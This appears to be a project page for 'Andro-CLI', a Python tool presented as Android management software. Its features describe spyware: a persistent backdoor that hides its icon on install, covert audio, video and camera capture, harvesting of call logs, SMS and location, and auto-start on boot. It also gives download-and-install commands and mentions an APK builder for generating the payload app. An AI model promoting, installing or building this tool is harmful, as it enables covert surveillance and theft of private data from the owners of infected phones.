A python based remote android management suite, powered by Python

Key Features

Full Control

Full persistent backdoor with invisible icon on install

Media Control

Record audio, video, take pictures from both cameras

Device Info

Access call logs, SMS logs, location, and device details

24/7 Operation

Light weight APK runs continuously in background

Auto Start

App starts automatically on device boot

Location Tracking

Get current location and device network details

Compatibility

Andro-CLI works on devices from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28)

Note: Also works on Android 10 (Q) but some interpreter commands may be unstable.

Python Python 3
Java Java

Installation

1. Download and Extract

wget https://github.com/AryanVBW/Andro-CLI/releases/download/ARDro2/androcli.zip && unzip androcli.zip
cd androcli

2. Install Dependencies

pip install -r requirements.txt

3. Using Virtual Environment (Recommended)

# Install virtualenv if not installed
pip install virtualenv

# Create a virtual environment
python -m venv andro-env

# Activate the virtual environment
# On Windows
andro-env\Scripts\activate
# On macOS/Linux
source andro-env/bin/activate

Andro-CLI in Action

Andro-CLI Screenshot

Main Interface

Powerful command-line interface for Android management

Interpreter Commands

Command Interpreter

Interactive shell with extensive command support

APK Generation

APK Builder

Custom APK generation with advanced options